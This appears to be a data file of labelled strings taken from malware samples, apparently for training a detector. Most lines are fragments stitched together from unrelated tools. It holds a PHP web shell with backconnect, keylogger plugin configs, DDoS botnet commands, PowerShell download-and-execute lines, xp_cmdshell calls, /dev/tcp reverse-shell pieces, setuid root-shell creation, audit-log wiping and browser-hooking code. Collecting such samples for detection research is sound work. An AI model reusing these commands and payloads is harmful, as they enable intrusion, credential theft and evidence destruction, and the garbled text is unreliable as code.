\"delete\"?\" selected\":\"\").\">delete</option>\";if (!is_readable($o)) {return \"<font color=red>\".view_perms(fileperms($o)).\"</font>\";}displaysecinfo(\"list of attributes\",myshellexec(\"lsattr -a\"));displaysecinfo(\"ram\",myshellexec(\"free -m\"));displaysecinfo(\"where is perl?\",myshellexec(\"whereis perl\"));$ret = myshellexec($handler);if (posix_kill($pid,$sig)) {echo \"ok.\";}$connection = @ftp_connect($ftp_server,$ftp_port,10);echo $lang[$language.'_text98'].$suc.\"\\r\\n\";$blah = ex($p2.\" /tmp/back \".$_post['backconnectip'].\" \".$_post['backconnectport'].\" &\");$_post['backcconnmsge']=\"</br></br><b><font color=red size=3>error:</font> can't backdoor host!</b>\";$_post['cmd'] = which('<option value=\"wget http://ftp.powernet.com.tr/supermail/debug/k3\">kernel attack (krad.c) pt1 (if wget installed)<center>kernel info: <form name=\"form1\" method=\"post\" action=\"http://google.com/search\">which wget curl w3m lynxnetstat -atup | grep istelseif ( enabled(\"exec\") ) { exec($cmd,$o); $output = join(\"\\r\\n\",$o); }<form method=\"post\"><input type=hidden name=act value=\"ls\">foreach($quicklaunch2 as $item) {echo \"<option value=\\\"\". strrev(substr(strstr(strrev($work_dir), \"/\"), 1)) .\"\\\">parent directory</option>\\n\";for (i=1; i<=frmupload.max.value; i++) str+='file '+i+': <input type=file name=file'+i+'><br>';if (frmupload.max.value<=0) frmupload.max.value=1;
1 evict1.pdbhttp://testing.corp 08
1 iofreemdlkfreleasespinlock<shortdescription>keystroke collector</shortdescription>this plugin is the e_qwerty kernel mode driver for logging keys.</description><commands/></version><associatedimplantid>20121</associatedimplantid><rightsrequired>system or administrator (if administrator, i think the driverins<platforms>windows nt, windows 2000, windows xp (32/64 bit), windows 2003 (32/64<projectpath>plugin/collection</projectpath><dlldepend>none</dlldepend><minortype>0</minortype><pluginname>e_qwertykm</pluginname></comments><comments><majortype>1</majortype><files>none</files><poc>erebus</poc><team>none</team><?xml-stylesheet type=\"text/xsl\" href=\"../xslt/pluginhtml.xsl\"?><pluginsdepend>u_hookmanager v1.0, kernel covert store v1.0</pluginsdepend><plugin id=\"20123\" xmlns:xsi=\"http://www.w3.org/2001/xmlschema-instance\" xsiwarriorpride\\production2.0\\package\\e_wzowski<!-- edited with xmlspy v5 rel. 4 u (http://www.xmlspy.com) by team (renegade) -<configfilename>20123_cmddef.xml</configfilename><name>20123.sys</name><codebase>/bin/i686-pc-win32/debug</codebase>\
1 wh_keyboard_llwsock32.dllwininet.dll\\chicken\\release\\svchost.pdb\\intergratechk\\release\\intergratechk.pdbfake.cf8.8.8.8processor(%d)\\dbprotectsupportdm1712/`jvpnpkte/bplinstallservice npf %d68961installservice dbprotectsupport %dc:\\program files\\dbprotectsupport\\npf.sysfake.cfgthreadattack.cppfake.cppdns_arraydomainrandexcpu %llu %llu %llu %llu[ %02d.%02d %02d:%02d:%02d.%03ld ] [%lu] [%s] %scoded by brian krebs for personnal use only. i love my job & wife.http://%02x%02x%02x%02x%02x%02x%02x%02x.com/%02x%02x%02x%02x/%02x%02x%02x%02x%02x.php%botid%%botnet%bc_removebc_addhttp://www.google.com/webhpcoded by brian krebs for personal use only. i love my job & wife
1 h:\\prj2012\\zxapp-console\\remotedesktop\\releasetest\\remotedesktop.pdbtransfile -get http://x.x.x.x/a.exe c:\\a.exe -run (launch it after downloading completed.)sendfirstscreen size=%d ret=%d.zxplug -add getxxx c:\\xyz.dll -fromurl http://x.x.x/x.dll [+]hook kifastcallentry success[+]initsystemcallentry success[+]driver communication success[-]driver communication failurehidedriverfromobjectdirectory okhidedriverfrompsloadedmodulelist okpacth_kedelayexecutionthread is 0x%xpacth_exallocatepoolwithtag is 0x%xpacth_exallocatepool is 0x%xh:\\kernel\\sshell\\systemcallentry.c!!attack:%wzh:\\kernel\\sshell\\killprocess.ch:\\kernel\\sshell\\objchk_win7_x86\\i386\\usbhpms.pdb= %wz----%d----%d---%d[zxconfig]myip=port=banner=backconnect=
1 cd46a1a84ba06cea35d5e0219062162f227fdb26%s(error=%d)capapi32openservice failcreateservice failhttp://wpa.qq.com/msgrd?v=1&uin=312016&site=www.cnasm.com&menu=yesexplorer.exehttp://www.cnasm.com/gui/help.htmlhttp://www.cnasm.com/gui/error.htmlc
1 get-content $env:public\\libraries\\update.vbs) -replacewss.run \"powershell.exe \" & chr(34) & \"& {waitfor haha /t 2}\" & chr(34), 0call extract(updatevbs, wss.expandenvironmentstrings(\"%public%\") & \"\\libraries\\update.vbs\")createobject(\"wscript.shell\").run cmd, 0ojgdsb2jhbdptewhvc3qgpse9nrt0ijxb1ymxpyyvctglicmfyawvzxu2v0ihdzcya9ienyzwf0zu9iamvjdcgid1njcmlwdc5tagvjhnjcmlwdgrpcia9ifnwbgl0lvbhdggglvbhcmvudcatugf0acadqptzxqgd3nzid0gq3jlyxrlt2jqzwnd2hvyw1picygag9zdg5hbdownloadexecute=\"powershell \"\"&{$r=get-random;$wc=(new-object system.net.webclient);$wc.downloadfile(-executionpolicy bypass -file \"&home&\"dns.ps1\"createobject(\"wscript.shell\").run replace(downloadexecute,\"-_\",\"bat\")createobject(\"wscript.shell\").run dnscmd,0http://winodwsupdates.me%userprofile%\\appdata\\local\\microsoft\\ $fdn=[system.text.encoding]::utf8.getstring([system.convert]::frombase64string('&{$rn = get-random; $id = 'tr') -replace '__',('dns'+$id) | \\upd.vbsschtasks /create /f /sc minute /mo ') -replace '__',('htp'+$id) | &{$rn = get-random -minimum 1 -maximum 10000; $id = 'azhttp://www.israirairlines.com/?mode=page&page=14635&lang=eng<source code from https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.htmlrrrr\\libraries\\fireueye.vbs\
1 %d of %d target%s%scompleted, %lu valid password%s found[%d][smb] host: %s account: %s error: account_change_passwordhydra -p pass.txt target cisco-enable (direct console access)[%d][smb] host: %s account: %s error: password expired[error] smtp login auth, either this auth is disabled\"/login.php:user=^user^&pass=^pass^&mid=123:incorrect\"used pepack!\\temp\\ntgodmode.exentgod.batsfxcmdc:\\temp\\vncviewer4.log[bl4ck] patched by redsand || http://blacksecurity.orgfake release extendedvkey 0x%x, keysym 0x%xpipecmd \\\\%s -u:%s -p:\"\" %s[usage]: %s <hostname|ip> <username> <password>pipecmd \\\\%s -u:%s -p:%s %s============by uhhuhy (feb 18,2003) - http://www.cnhonker.net===================================ntcmd v0.11 for hscan v1.20=======================ntcmd>mysql_pwd_crack 127.0.0.1 -x 3306 -p root -d userdict.txtsuccessfully --> username %s password %s zhouzhen@gmail.com http://zhouzhen.eviloctal.org-a automode automatic crack the mysql password mysql_pwd_crack 127.0.0.1 -x 3306 -ac
1 r^[lbgmrhttp://tuginsaat.com/wp-content/themes/twentythirteen/stats.phpr
1 x264 - core 148 - h.264/mpeg-4 avc codec - copyleft 2003-2015 - http://www.videolan.org/x264.html - options: cabac=1 ref=1 deblock=1:0:0 analyse=0x3:0x113 me=hex subme=2 psy=1 psy_rd=1.00:0.00 mixed_ref=0 me_range=16 chroma_me=1 trellis=0 8x8dct=1 cqm=0 deadzone=21,11 fast_pskip=1 chroma_qp_offset=0 threads=7 lookahead_threads=1 sliced_threads=0 nr=0 decimate=1 interlaced=0 bluray_compat=0 constrained_intra=0 bframes=3 b_pyramid=2 b_adapt=1 b_bias=0 direct=1 weightb=1 open_gop=0 weightp=1 keyint=250 keyint_min=25 scenecut=40 intra_refresh=0 rc_lookahead=10 rc=crf mbtree=1 crf=24.0 qcomp=0.60 qpmin=0 qpmax=69 qpstep=4 ip_ratio=1.40 aq=1:1.00
1 citadel hooking error[%s]: checking \"ftp account: ftp/ftp@ftp.net\" ...[%s]: ipc null session connection success !!!scan %d targets,use %4.1f minuteshttp://blog.gentilkiwi.com/mimikatzbenjamin delpyglobalsignc
1 beijing1del /f /s /q %systemdrive%\\*.log del /f /s /q %windir%\\*.bak del /f /s /q %systemdrive%\\*.chk del /f /s /q %systemdrive%\\*.tmp del /f /q %userprofile%\\cookies s\\*.* rd /s /q %windir%\\temp & md %windir%\\temp del /f /s /q %systemdrive%\\recycled\\*.* del /f /s /q \"%userprofile%\\local settings\\temp\\*.*\" del /f /s /q \"%userprofile%\\local settings\\temporary internet files\\*.*\" tasklist |find \"clear.bat\"||start clear.bathttp://www.coffeewl.comping -n 2 localhost 1>nul 2>nulfor /l %%a in (mode con: cols=42 lines=5text files (*.txt);;all files (*)http://ubrute.comip - %d; password - %d; combination - %dget_crackedcredentialss
1 '\http://%s/~%s/cgi-bin/%s.cgi?%sh
1 post http://%s:%d/aspxabcdefg.asp?%s http/1.1get http://%s:%d/aspxabcdef.asp?%s http/1.1s
1 post http://%ls:%d/%x http/1.1%%temp%%\\%s_p.ax%temp%\\uid.ax%%temp%%\\%s.axsysinfo\x00sysbin01\\flashupdate.exerat_uninstall!! use splice socket !!user-agent: sjzj (compatible; msie 6.0; win32)g_nav=%d,hwnd:0x%x,classname:%s,title:%s,(%d,%d,%d,%d),bool=%du4(ueknmiq/'p_9pjmficmp.dlleg}qaptsjwj:uo2nqpp2}w8weilqkc:lf1yzmka
1 http://www.jmicron.co.tw0suckm3 from explorer.exe moth4fucka #@!\
1 %s <proxy ip> <proxy port> <target ip> <target port> <cmd> [arg1 cmd] ... [argx cmd][-] error in connection() %d - %s[-] child process exit.post http://%s:%s/ http/1.1pipe() topipe() frommiiepqibaakcaqea4lsvv/w1mkz38q3z+ezjbzranzkrlxee6/uxwl67ytokf2nniaes3cca4wli6+9cigx8saixd5oezhvi1jza61z/flsqcc1ip//gjvt16nrx3s9z%windir%\\ativpsrz.bin%windir%\\ativpsrn.bink
1 \\\\%s\\ipcs.exe %s %s %s %s %d /saves.exe start error...%dexec sp_addextendedproc xp_cmdshell,'xplog70.dll'exec master..xp_cmdshell 'wscript.exe cc.js'usage:sql.exe [options]%s root %s %d errorpass.txtselect sillyr_at_gmail_dot_com into dumpfile '%s\\\\sillyr_x.so' from sillyr_xscan.batgogogo.batip.txtfor /f %%i in (ips.txt) do (start cmd.bat %%i)445\\nc.exe445\\s.execs.exe %1445\\cs.exe445\\ip.txt445\\cmd.batnormal scan: about to scan %u ip for %u ports using %d threadsyn scan: about to scan %u ip for %u ports using %d threadexample: %s tcp 12.12.12.12 12.12.12.254 21 512 /bannersomething wrong about the portsperforming time: %d/%d/%d %d:%d:%d --> example: %s tcp 12.12.12.12/24 80 512 /t8 /save%u ports scanned.taking %d threads %-16s %-5d -> \"%s\"syn scan can only perform on win 2k or abovesyn scan: about to scan %s:%d using %d threadscan %s complete in %d hours %d minutes %d seconds. found %u open ports@sql.exe -f ip.txt -m syn -t 3306 -c 5000 -u http://60.15.124.106:63389/tasksvr.nc %1 4444for /f \"delims=\" %%x in (endend.txt) do call :lisoob %%xhttp://www.tzddos.com/ -------------------------------------------->byebye.txtren %systemroot%\\system32\\drivers\\tcpip.sys tcpip.sys.bakif /i \"%wangle%\"==\"\" ( goto start ) else ( goto erromm )copy *.tzddos scan.bat&del *.tzddosdel /f tcpip.sysif /i \"%cb%\"==\"www.tzddos.com\" ( goto mmbat ) else ( goto wangle )call scan.batif /i \"%erromm%\"==\"\" ( goto start ) else ( goto zuihoujh )if /i \"%zuihoujh%\"==\"\" ( goto start ) else ( goto laji )sc config lmhosts start= autocopy tcpip.sys %systemroot%\\system32\\drivers\\tcpip.sys > nulren %systemroot%\\system32\\dllcache\\tcpip.sys tcpip.sys.bak123456.com123123.com360.comjuso.comsina.comchangemechinanetlionkingmultithreading posts_send killerget [access point] http/1.1the program's need files was not exist!j
1 locatesymbolmmrecsversionocmdccmdprtscfc001trj:strpsetservfreshservw7v1.2.10http://%s:%d/put[%s]/fc001/%spittytiger{\\
1 miniasp3\\release\\miniasp.pdbhttp://%s/about.htmhttp://%s/result_%s.htmopen internet failed
1 http://www.hkmjj.com-------
1 cpports.txt,get / http/.}f
1 http://142.91.76.134/p.dathttpdump 1.1s
1 http://www.wasabii.com.tw 0'wymajtec$tima stempijg sarviges ga -$g2ahdneafe1.syssotefehj3.sysmainsys64.sys\
1 virtualprotectexinvalid parameterwinsta0\\defaultexplorer.execreateprocessasuserahttpendrequestagetmodulebasenameagetmodulefilenameexaenumprocessesspsssqproxy-authorization:basic kpstorecreateinstancefeb 04 2015i can not start %sdwconnectportdwremotelanportstrremotelanaddressstrlocalconnectip\
1 internetqueryoptionawnetenumresourceahttpsendrequestexapsapi.dllm
1 iphlpapi.dllystem\\currentcorolset\\port.txv1.2 bget a http/1.0e
1 downloadfile - exception:%s,code:0x%08x.mozilla/4.0 (compatible; msie 7.0; windows nt 5.1)cdllapp::initinstance() - evnet already exists../emptycriss <target ip>cut and paste the following to the telnet prompt:environ define ttyprompt abcdefrunning \\\"tcpdump -n -n\\\", on the environment variable \\$interface, scriptedcannot read $opetc/scripme.override -- are you root?$env{exploit_scripme}the encryption key is ___tempfile2.outunless the -c (clobber) option is used, if two retr commands of themywarn(\"end of $destfile determined by \\\"^connection closed by foreign host\\\"\")end of $destfile determined by \"^connection closed by foreign host> /var/log/audit/audit.log; rm -f .pastables to run on target:cp /var/log/audit/audit.log .tmphere is the first good cron session fromno need to clean login lines.sh >/dev/tcp/ <&1 2>&1test: mungedport=%6d pp=%d unmunged=%6decho \"example: ${0} -l 192.168.1.1 -p 22222 -x 9999\"-x [ port to start mini x server on default = 12121 ]\"callback_port=32177usage: %s -e -v -i target ip [-c cert file] [-k key file]type=licxfer&ftp=%s&source=/var/home/ftp/pub&version=na&licfile=[-l log file] [-m save mac time file(s)] [-p server port]chown root sh; chmod 4777 sh;cp /bin/sh .;chown root sh;echo clean up when elevated:exe=$dir/sbin/ey_vrupdatedel --- usage: %s -l file -w wtmp -r userroasting ->%s<- at ->%d:%d<-rbnoil -roasting ->requested forwarding of port %d but user is not root.internal error: we do not read, but chan_read_failed for istate~# - list forwarded connectionspacket_inject_ignore: blockresult = self.send_command(\"ls -al %s\" % self.options.dir)cmd += \"d=-l%s \" % self.options.listen_portuse this on target to get your rat:$ratremotename && $command = \"$nc$bindto -vv -l -p $port < ${ratremotename}\" ;usage: %s -l [ netcat listener ] [ -p optional target port instead of 23 ] <ip>target is not vulnerable. exitingsending final buffer: evil_blocks and shellcode...timeout waiting for daemon to die. exploit probably failed.usage: %s <host> <port> e <contents of a local file to be executed on target>writing your %s to target.(e)xploit, (r)ead, (m)ove and then write, (w)rite-c command: shell command stringcannot combine shell command mode with args to do socket reuse-r: reuse socket for nopen connection (requires -t, -d, -f, -n, no -c)firing with the same hosts, on altername ports (target is on 8080, listener on 443)recieved unknown command payload: 0x%xusage: eslide [options] <-t profile> <-l listenerip> <targetip>-------- delete key - remove a *closed* tabusage: ./exp command display_to_return_tosizeof shellcode = %dexecve failed!echo \"example: ${0} -l 192.168.1.1 -p 22222 -s 22223 -x 9999\"echo \"call back port2 = ${sport}\"* * * * * root chown root %s; chmod 4755 %s; %s[-] kernel not vulnerable[-] failed to spawn shell: %s-s shell use shell instead of %susage: %s address [-t][-s|-c command] [-p port] [-v 5|6|7]error: not vulnerableport=%d connected! xxx.xxxxxxexecuting ./ebbnew_linux -r %s -v %s -a %s %s -t %s -p %s./ebbnew_linux.wrapper -o 2 -v 2 -t 192.168.10.4 -p 32772version 1 - start with option #18 first, if it fails then try this option%s is a wrapper program for ebbnew_linux exploit for sparc solaris rpc services# building shellcode into exploit.%s -w /index.html -v 3.5 -t 10 -c \"/usr/openwin/bin/xterm -d 555.1.2.2:0&\" -d 10.0.0.1 -p 80# starting exhaustive attack against usage: $prog [-f directory] -p prognum [-v ver] [-t proto] -i ipadr$gotsunos = ($line =~ /program version netid address service owner/ );+ bruteforce mode.+ host is not running samba!+ connecting back to: [%d.%d.%d.%d:45295]+ exploit failed, try -b to bruteforce.usage: %s [-bbccdfprsstv] [host]** significantly improve processing time-c cmd_name: strncmp() search for 1st %d chars of commands that mysql \\$d --host=\\$h --user=\\$u --password=\\\"\\$p\\\" -e \\\"select * from \\$twindow 3: $0 -uadmin -ppassword -i127.0.0.1 -dipboard -c\\\"sleep 500|nc$ua->agent(\"mozilla/4.0 (compatible; msie 6.0; windows nt 5.0)\");$url = $host . \"/admin/index.php?adsess=\" . $enter . \"&app=core&module=applications&section=hooks&do=install_hook\";usage: %s -i <ip_addr/hostname> -c <command> -t <target_type> (-u <port> | -t <port>) -i target ip address / hostname note: choosing the correct target type is a bit of guesswork.solaris rpc.cmsd remote root exploitif one choice fails, you may want to try another.shellfilecompleted.1zeke_remove%s/%s server failing (looping), service terminatedgetpwnam: %s: no such userexecv %s: %m%s/%s: unknown service?usage: %s <shellcode> <output_file>here is the decoder+(encoded-decoder)+payloadusage: %s hostip port cmd [printer_name]command must be less than 61 chars__rw_read_waiting__mutexkind__rw_psharedusage: %s [-v] -t <target_ip> -p porterror - shellcode not as expected - unable to fix upwarning - core wipe mode - this will leave a core file on target[-c] wipe target core file (leaves less incriminating core on failed target)-a <jumpaddr> (shellcode address)*** insane undocumented incremental port mode!!! ***%x:%d --> %x:%d %d bytesclient: can't bind to local address, are you root?unable to register portcould not resolve destinationraw troubles$gotgs=1 if (($line =~ /scan for (sol|snmp)\\s+version/) orusage: $prog [-f file] -p prognum [-v ver] [-t proto] -i ipadr$scanth = $scanth . \" -s \" . $scanthreads;print \"java -jar jscanner.jar$scanth$list\\n\";exec(\"xterm $xargs -e /current/tmp/promptkill.kid.$tag $pid\");$xargs=\"-title \\\"kill process $pid?\\\" -name \\\"kill process $pid?\\\" -bg white -fg red -geometry 202x19+0+0\" ;.tmp.%d.xxxxxx[-] couldn't create temp file/boot/system.map-%s[+] shellcode prepared, re-executing[-] kernel not vulnerable: prctl[-] shell failed[!] selinux apparently enforcing. continue [y|n]? t=<target ip> [o=<port>] y=<target type>no command given!! bailing...no port. assuming 22.../tmp/ratload.tmp.shremote usage: /bin/telnet locip locport < /dev/console | /bin/sh\"uncompress -f ${name}.z && path=. ${args1} ${name} ${args2} && rm -f ${name}exploit_scripme=\"$exploit_scripme\"deftarget=`head /current/etc/opscript.txt 2>/dev/null | grepip 2>/dev/null | head -1`fatal error: -x port and -n port must not be the same.example: ewok -t target publicusage: cleaner host community fake_prog-g - subset of -m that green spirit hits --- ewok versionusage: xspy -display <display> -delay <usecs> -upchown root:root x;chmod 4777 x`' /tmp/logwatch.$2/cronusage: $0 ( -s ip port | cmd )os.execl(\"/bin/sh\", \"/bin/sh\", \"-c\", \"$cmd\")php_script=\"$home/public_html/info$x.php\"cat > /dev/tcp/127.0.0.1/80 <<end*** sorry about the raw output, i'll leave it for now-scan winn %s oneset uremoteuploadcommand \"[exec cat /current/.ourtn-ftshell-upcommand]\"send \"\\[ \\\"\\$bash\\\" = \\\"/bin/bash\\\" -o \\\"\\$shell\\\" = \\\"/bin/bash\\\" \\] &&system rm -f /current/tmp/ftshell.latest# ftshell -- file transfer shellwelcome to the network scanning toolscanning port %d/current/down/cmdout/scansscan for ssh versionprogram vers proto port serviceusage: %s [-v os] [-p] [-r] [-c command] [-a attacker] targetsending shellcode as part of an open command...cmdshellcodeyou will not be able to run the shellcode. exiting...e.g.: -n 1-1024,1080,6666,31337 # default is to dump out all scanned hosts found$bool .= \" -r \" if (/mibiisa.* -r/);sadmind is available on two ports, this also works)-x ip gives \\\"hostname:# users:load ...\\\" if positive xwin scanheader(\"set-cookie: bbsessionhash=\" . \\$hash . \"; path=/; httponly\");if ($code =~ /proxyhost/) {\\$rk[1] = \\$rk[1] - 1;#existsuser($u) or die \"user '$u' does not exist in database.\\n\";temp = ((left >> 1) ^ right) & 0x55555555right ^= (temp << 16) & 0xfffffffftempresult = \"\"num = self.bytes2long(data)if { [string length $uremoteuploadcommand]processuploadglobal dothisreallyquiet[-] failed to map file: %s[-] can not null terminate input data[!] name has size of 0!rsakey_txt = lo_execute('openssl genrsa 2048 2> /dev/null | openssl rsa -text 2> /dev/null')client_auth = binascii.hexlify(lo_execute('openssl rand 16'))[%.2u%.2u%.2u%.2u%.2u%.2u]0123456789abcdefabcedf:a}%j,r
1 http://google.com/mozilla/5.0 (compatible; msie 9.0; windows nt 6.1; wow64; trident/5.0; malc)o
1 match operate system failed, 0x%00004x:%u:%d(window:ttl:df)example: xport www.xxx.com 80 -m syn%s - command line port scannerxport 192.168.1.1 1-1024 -t 200 -vusage: xport <host> <ports scope> [options].\\port.iniport scan complete, total %d port, %d port is opened, use %d ms.http://www.xfocus.orgp
1 connecting http port - result: no space for command line argument vectormicrosoft(july/1999~) http://www.microsoft.com/technet/security/current.aspno space for copy of command line- windows nt,2000 patch method - scanf : floating point formats not linkedhrdir_b.c: loadlibrary != mmdll borlndmm failed!\"what?\"%s port %d closedprintf : floating point formats not linkedxxtype.cpp-err invalid command, type [help] for command list-err get sms users id failedcontrol time out 90 secs, connection closed-err post sms failedcurrent.hlthistroy.hlt-err send sms failed-err change password <new password>+ok send sms succussifully+ok set new password: [%s]change passwords:\\ammyy\\sources\\target\\trservice.cpps:\\ammyy\\sources\\target\\trdesktopcopyrect.cppglobal\\ammyy.target.incomeports:\\ammyy\\sources\\target\\trfmfilesys.cppplease enter password for accessing remote computercreateprocess1()#3 %d error=%dchttpclient::sendrequest2(%s, %s, %d) error: invalid host name.error: createprocessasuser() error=%d, session=%derror: findprocessbyname('explorer.exe')or: %s -r [host.tty]%s: process: character, ^x, or (octal) \\032 expected.type \"screen [-d] -r [pid.]tty.host\" to resume one of them.%s: at [identifier][%%|*|#] command [args]slurped only %d characters (of %d) into buffer - try againcommand from %s: %s %s[ passwords don't match - your armor crumbles away ][ passwords don't match - checking turned off ]writing packet : error on socket (or connection closed): %sremote connection closed by signal sig%s %sreading private key %s failed (bad passphrase ?)server closed connection%s: line %d: list delimiter not followed by keywordchecking for version `%s' in file %s required by file %sremote host closed connection%s: line %d: bad command `%s'verifying that server is a known host : file %s not found%s: line %d: expected service, found `%s'%s: line %d: list delimiter not followed by domainpublic key from server (%s) doesn't match user preference (%s)# pscan completed in %u seconds. (found %d ips)usage: %s <b-block> <port> [c-block]%s.%d.* (total: %d) (%.1f%% done)invalid ip.# scanning: unable to allocate socket.cat trueusers.txt | mail -s \"eyes\" clubby@slucia.commv scan.log bios.txtrm -rf bios.txtecho -e \"# by eyes.\"././pscan2 $1 22echo \"#cautam...\"echo -e \"${blu}private scanner by raphaello , demmonn , tzepelush & drac\\n\\rkillall -9 pscan2echo \"[*] ${dcyn}gata esti h4x0r ;-)${res} [*]\"echo -e \"${dcyn}@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#${res}\"snprintf(outfile, sizeof(outfile) - 1, \"scan.log\", argv[1], argv[2]);printf(\"usage: %s <b-block> <port> [c-block]\\n\", argv[0]);printf(\"\\n# pscan completed in %u seconds. (found %d ips)\\n\", (time(0) - scaconnlist[i].addr.sin_family = af_inet;snprintf(last, sizeof(last) - 1, \"%s.%d.* (total: %d) (%.1f%% done)\",wscript.echo \" $$\\ $$\\ $$\\ $$\\ $$$$$$\\ $$$$$$$$\\ $$\\ $$\\ $$$$$$$$\\ $$$$$$plug-in thread causes an exception, failed to alert user.pluggetudpportpluggettcpportpluggetvulnnum\\\\.\\pipe\\pipecmd_communicatonpipecmd servicel
1 httpfloodsynfloodudpfloodtcpflooddownandexevisitsocksm
1 appdata\\local\\temp\\_.net_\\msiexec.exetype:on_execuid:%spriv:%sarch:x%sgend:%scores:%iver:%snet:%s|type:on_exec|uid:%s|priv:%s|arch:x%s|gend:%s|cores:%i|os:%s|ver:%s|net:%s||type:repeat|uid:%s|ram:%ld|bk_killed:%i|bk_files:%i|bk_keys:%i|busy:%s|filesearch.stoprapidgetlayer4.slowlorisrudyddos.war.smartviewftp.upload%s %s :%s layer4 combo flood: stopped%s %s :%s irc war: flood started [type: %s | target: %s]%s %s :%s ftp upload: failedathena v2%s %s :%s ecf flood: stopped [total connections: %ld | rate: %ld connections/second]arme flood on %s/%s:%i for %i seconds [host confirmed vulnerable rapid http combo flood on %s:%i for %i secondsbegan flood: %i connections every %i ms to %s:%iipkiller>athenaathena=shit!athena-v1btc wallet.dat file foundminecraft lastlogin file foundprocess '%s' was found and scheduled for deletion upon next rebootuser-agent: mozilla/4.0 (compatible; msie 7.0; windows nt 5.1; trident/4.0; .net clr 1.1.4322; .net clr 2.0.503l3; .net clr 3.0.4506.2152; .net clr 3.5.30729; msoffice 12)rapid connect/disconnectbtc wallet.dat found,:!arme:!openurl:!condis:!httpcombo:!urlblock:!udp:!btcwallet533d9226e4c1ce0a9815dbeb19235ae4x-ts-rule-name: %sx-ts-rule-patternid: %ux-ts-botid: %sx-ts-domain: %sx-ts-sessionid: %sx-ts-header-cookie: %sx-ts-header-referer: %sx-ts-header-acceptencoding: %sx-ts-header-acceptlanguage: %sx-ts-header-useragent: %s_hvnc_init@4_hvnc_uninit@0_hvnc_start@8_hvnc_stop@0_hvnc_wait@0_hvnc_work@0nspr4.dllnss3.dllchrome.dllu
1 microsoft enhanced cryptographic provider v1.0\\system32\\svchost.exe:repeat\x0d\x0adel %s\x0d\x0aif exist %s goto :repeat\x0d\x0adel %%0.php?compname=/path_active.php?compname=/fetch_updates_pops.php?compname=/is_array_own.php?compname=/checkpkg.php?compname=/versionchk.php?srs=/vtris.php?srs=/vtris1.php?srs=/fetch_updates_step.php?compname=/c wmic diskdrive list brief > /petal_active.php?compname=percf001.dat_percf001.datcurl_easy_performhttp://199.91.173.45/percf002.dathttp://199.91.173.45/update_dll.dllhttp://199.91.173.45/libcurld.dll!microsoft!winusb.exec:\\intel\\logs\\file.pdbc:\\users\\tranchulas\\documents\\visual studio 2008\\projects\\upload\\release\\upload.pdbc:\\users\\cert-india\\documents\\visual studio 2008\\projects\\ufile\\release\\ufile.pdbdoworku
1 dgmnoep/%s%s%s/?%s=control panel\\dehttps=https://%snetwork.proxy.ht2http=http://%s:%control panel\\denetwork.proxy.ht&ol1ms9c
1 99e2428cca4309c68aaf8c616ef3306582a64513e55c786a864bc83dafe0c78585b692047273b0e55275102c664c5217e76b8e67f35fce385e4328ee1ad139ea6aa26345c4f93000dbbc7ef1579d4fhttp/1.1 200 ok
1 http://arm.533.nettftpd32.hlptimeouts and ports should be numerical and can not be 0t
1 dom4!nuserp4ss273ce6-b29f-90d618c0ace123dxace123dxl!ace123dx!@#x/catelog/login1.asp~dftmp$$$$$.1get /query.asp?loginid=loadconfigfromreg faildedloadconfigfrombuildin success/photoe/photo.asp httppost /photos/photo.asppcc_ident$$$--hellowrod--$$$.?avpcc_basemod@@ps1=rk# \\u@\\h:\\w \\$unset ls_options;uname -a[diskio]/tmp/.secure\x7felf\
1 \\systemroot\\system32\\ci.dll\\sysnative\\ci.dllmozilla/5.0 (windows nt 6.1; wow64) applewebkit/537.36 (khtml, like gecko) chrome/36.0.1985.125 safari/537.36crtdll.dllinternetopena coolio, trying open %s029.hdlhttp.execontent-disposition: form-data; name=\"file1\"; filename=\"%s\"%allusersprofile%\\accessories\\wordpade.exe\\dumps.dat\\%s|%s|4|%d|%4d-%02d-%02d %02d:%02d:%02d|\\%s|%s|5|%d|%4d-%02d-%02d %02d:%02d:%02d|ckanbh9fnmxgjcsbxx5nfs+8s7abcq==ckanbhfln1nxmccr0rlbmq==select * from moz_logins;makescr.dat%s\\mozilla\\firefox\\profiles.ini?moz-proxy://[%s-%s] title: %scforeign key mismatch - \"%w\" referencing \"%w\"windows 95 sr2\\|%s|0|0|c:\\users\\john\\desktop\\potplayer\\release\\potplayer.pdbpotplayer.dll\\update.datht_exploitht_exploitflash_exploit_exp1_fla/maintimelineexp2_fla/maintimeline_shellcode_32todo: unknown 32-bit targeth
1 dbnextrow[usage]: %s <hostname|ip> <username> <password>=============by uhhuhy(feb 18,2003) - http://www.cnhonker.net=============cool! connected to sql server on %s successfully!exec master..xp_cmdshell \"%s\"=======================sqlcmd v0.21 for hscan v1.20=======================error,exit!sqlcmd>h
1 attempting to unlock uninitialized lock!unable to load kernel32.dll%s len:%d encountered error sending syscall response to client/info.daterror entering thread lockerror exiting thread lockconnect_back_tcp_channel_init:: socket() failedmitb.poisonanchorthis.request(this.httpprotobeef.logger.get_dom_identifierreturn (!!window.operahistory.pushstate({ be:\"ef\" }window.navigator.useragent.match(/opera\\/9\\.80.*version\\/10\\./)window.navigator.useragent.match(/opera\\/9\\.80.*version\\/11\\./)window.navigator.useragent.match(/avant tricore/)window.navigator.useragent.match(/iceweaselmitb.sniff(method xmlhttprequest.open override.browser.haswebsocket.mitb.poisonformresolved=require.resolve(file,cwd||if (document.domain == domain.replace(/(\\r\\n|\\n|\\r)/gmbeef.net.requestuagent.search(engineopera)beef.logger.start-ep bypass-executionpolicy bypass-win hidden-w hidden-encodedcommand.300000000.saz.pcap.chlsalina v1.01[0-2])[0-9]
1 <configfilename>20121_cmddef.xml</configfilename><name>20121.dll</name><codebase>\"reserved for future use.\"</codebase><plugin xmlns:xsi=\"http://www.w3.org/2001/xmlschema-instance\" xsi:nonamespaces<platform type=\"1\"></plugin></pluginconfig><pluginconfig></platform></lpconfig><lpconfig>20123.dllk
